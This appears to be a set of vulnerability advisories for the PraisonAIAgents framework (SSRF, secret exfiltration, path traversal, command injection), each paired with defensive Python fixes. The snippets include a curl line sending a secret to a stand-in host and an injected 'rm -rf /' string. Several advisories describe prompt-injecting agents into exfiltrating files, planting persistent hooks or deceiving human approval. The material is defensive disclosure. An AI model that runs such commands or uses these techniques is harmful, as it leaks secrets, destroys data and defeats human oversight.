PraisonAIAgents
Server-Side Request Forgery (SSRF) in PraisonAIAgents versions prior to 1.5.128 allows unauthenticated attackers to manipulate LLM agents into crawling arbitrary internal URLs. The httpx fallback crawler accepts user-supplied URLs without host validation and follows redirects, enabling access to cloud metadata endpoints (169.254.169.254), internal services, and localhost. Response content is returned to the agent and may be exposed in attacker-visible output. This vulnerability is the default behavior on fresh installations without Tavily API keys or Crawl4AI dependencies. No public exploit identified at time of analysis.
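The missing host validation could look like the sketch below. This is an illustrative guard, not the project's patched code; the function name `is_safe_url` is hypothetical. It resolves the hostname before checking, so DNS names pointing at internal addresses are caught as well as literal IPs:

```python
import ipaddress
import socket
from urllib.parse import urlparse

def is_safe_url(url: str) -> bool:
    """Reject URLs that resolve to private, loopback, link-local, or
    reserved addresses (e.g. the 169.254.169.254 metadata endpoint)."""
    parsed = urlparse(url)
    if parsed.scheme not in ("http", "https"):
        return False
    host = parsed.hostname
    if host is None:
        return False
    try:
        # Resolve the hostname so DNS-based bypasses are also caught.
        addr = ipaddress.ip_address(socket.gethostbyname(host))
    except (socket.gaierror, ValueError):
        return False
    return not (addr.is_private or addr.is_loopback
                or addr.is_link_local or addr.is_reserved)
```

Note that a check of this kind must also be re-applied on every redirect hop, since the advisory notes the fallback crawler follows redirects.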
Environment variable exfiltration in PraisonAIAgents versions prior to 1.5.128 allows unauthenticated remote attackers to steal secrets (database credentials, API keys, cloud access keys) through the execute_command function in shell_tools.py. The vulnerability exploits a deceptive command-approval flow: the unexpanded $VAR references shown to the human reviewer differ from the command the shell actually executes, in which the environment variable values have been expanded. Requires user interaction. No public exploit identified at time of analysis.
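The approval-preview discrepancy can be demonstrated with `os.path.expandvars`, which applies the same $VAR / ${VAR} expansion the shell would. This is a minimal sketch, assuming a hypothetical `preview_expanded` helper and a stand-in secret, not the project's actual approval code:

```python
import os

def preview_expanded(command: str) -> str:
    """Expand $VAR / ${VAR} references the way the shell would, so the
    human reviewer approves the command that will actually execute."""
    return os.path.expandvars(command)

# What the reviewer sees vs. what the shell runs:
os.environ["DEMO_SECRET"] = "s3cr3t"  # stand-in for a real secret
shown = "curl -d key=$DEMO_SECRET https://example.invalid"
print(preview_expanded(shown))  # curl -d key=s3cr3t https://example.invalid
```

Showing the expanded form at approval time (or refusing commands containing variable references) removes the gap between what is reviewed and what is executed.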
PraisonAIAgents versions prior to 1.5.128 allow unauthenticated remote attackers to enumerate arbitrary files on the filesystem by exploiting unvalidated glob patterns in the list_files() tool. An attacker can use relative path traversal sequences (../) within the glob pattern parameter to bypass workspace directory boundary checks, revealing file metadata including existence, names, sizes, and timestamps for any path accessible to the application process. This information disclosure vulnerability has a CVSS score of 5.3 (low/medium impact) and no public exploit code has been identified.
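A boundary check that closes this gap both rejects traversal sequences in the pattern and verifies each match resolves under the workspace root. The sketch below is illustrative only; `safe_list_files` is a hypothetical replacement, not the project's patched implementation:

```python
import tempfile
from pathlib import Path

def safe_list_files(workspace: str, pattern: str) -> list[str]:
    """Glob inside the workspace only: reject traversal sequences up
    front and drop any match that resolves outside the workspace root."""
    root = Path(workspace).resolve()
    if ".." in Path(pattern).parts:
        raise ValueError("traversal sequences are not allowed in patterns")
    matches = []
    for match in root.glob(pattern):
        resolved = match.resolve()
        # Keep only paths whose resolved location stays under the root.
        if resolved == root or root in resolved.parents:
            matches.append(str(resolved))
    return sorted(matches)

# Demo in a throwaway workspace:
demo = tempfile.mkdtemp()
(Path(demo) / "a.txt").write_text("hello")
```

Checking the resolved path (rather than the pattern string alone) also defends against symlinks that point outside the workspace.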
Server-side request forgery in PraisonAIAgents multi-agent system allows authenticated attackers to force internal network reconnaissance and data exfiltration through unvalidated URL crawling. The web_crawl() function in versions prior to 1.5.128 accepts arbitrary URLs from AI agents without scheme allowlisting, hostname blocking, or private network checks, enabling access to cloud metadata endpoints (AWS/Azure/GCP), internal services, and local filesystems via file:// URIs. Exploitation requires low-privileged authenticated access with network reachability and no user interaction. No public exploit identified at time of analysis.
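The missing scheme allowlisting and hostname blocking can be sketched as a pre-crawl validator. The names below (`validate_crawl_url`, the denylist contents) are illustrative assumptions; a production fix would also resolve hostnames and reject private address ranges, since a static denylist alone is bypassable:

```python
from urllib.parse import urlparse

ALLOWED_SCHEMES = {"http", "https"}
BLOCKED_HOSTS = {"localhost", "metadata.google.internal", "169.254.169.254"}

def validate_crawl_url(url: str) -> None:
    """Reject non-HTTP schemes (e.g. file://) and a denylist of known
    metadata/loopback hostnames before handing a URL to the crawler."""
    parsed = urlparse(url)
    if parsed.scheme not in ALLOWED_SCHEMES:
        raise ValueError(f"scheme {parsed.scheme!r} is not allowed")
    host = (parsed.hostname or "").lower()
    if host in BLOCKED_HOSTS:
        raise ValueError(f"host {host!r} is blocked")
```

The scheme allowlist alone already closes the file:// local-filesystem vector described above.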
PraisonAIAgents versions prior to 1.5.128 allow unauthenticated local attackers to read arbitrary files from the filesystem via the read_skill_file() function in skill_tools.py, which lacks the workspace boundary protections and approval requirements enforced by comparable file access functions. An agent subjected to prompt injection can exfiltrate sensitive files without user awareness or approval prompts, enabling confidentiality compromise with CVSS 6.2 (local attack vector, high confidentiality impact). No public exploit code or active exploitation has been reported at the time of analysis.
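The workspace boundary check the function lacks can be expressed as a resolve-then-compare guard. This is a hedged sketch of the general technique, not the project's patched read_skill_file; the demo file name is arbitrary:

```python
import tempfile
from pathlib import Path

def read_skill_file(workspace: str, rel_path: str) -> str:
    """Read a skill file only after confirming it resolves inside the
    workspace root, mirroring the checks applied by other file tools."""
    root = Path(workspace).resolve()
    target = (root / rel_path).resolve()
    if target != root and root not in target.parents:
        raise PermissionError(f"{rel_path!r} resolves outside the workspace")
    return target.read_text()

# Demo in a throwaway workspace:
demo = tempfile.mkdtemp()
(Path(demo) / "SKILL.md").write_text("skill body")
```

Resolving before comparing defeats both ../ traversal and absolute-path inputs, since Path joining with an absolute argument discards the workspace prefix entirely.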
Command injection in PraisonAIAgents memory hooks executor allows authenticated local attackers to execute arbitrary shell commands through unsanitized user input passed to subprocess.run() with shell=True. Affects versions prior to 1.5.128. Two attack vectors exist: direct exploitation via hook configuration (pre_run_command/post_run_command) and automated exploitation through .praisonai/hooks.json lifecycle hooks (BEFORE_TOOL/AFTER_TOOL). Agent prompt injection enables persistent compromise by overwriting hooks.json, executing payloads silently at every lifecycle event without user interaction. No public exploit identified at time of analysis.
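The standard remediation for shell=True injection is to tokenise the command and execute the argv directly, so shell metacharacters lose their meaning. `run_hook` below is a hypothetical replacement illustrating the technique, not the project's fix (and note it deliberately gives up shell features like pipes and variable expansion):

```python
import shlex
import subprocess

def run_hook(command: str) -> subprocess.CompletedProcess:
    """Execute a hook command without a shell: shlex.split tokenises the
    string and the resulting argv is exec'd directly, so metacharacters
    such as ';', '|', or '$(...)' arrive as literal arguments instead of
    being interpreted."""
    argv = shlex.split(command)
    return subprocess.run(argv, capture_output=True, text=True, check=False)

# An injected suffix becomes inert literal text:
print(run_hook("echo hello; rm -rf /").stdout)  # hello; rm -rf /
```

Hook configurations loaded from agent-writable files such as .praisonai/hooks.json should additionally be treated as untrusted input and gated behind user approval, since argv execution alone does not stop an attacker who controls the command's first token.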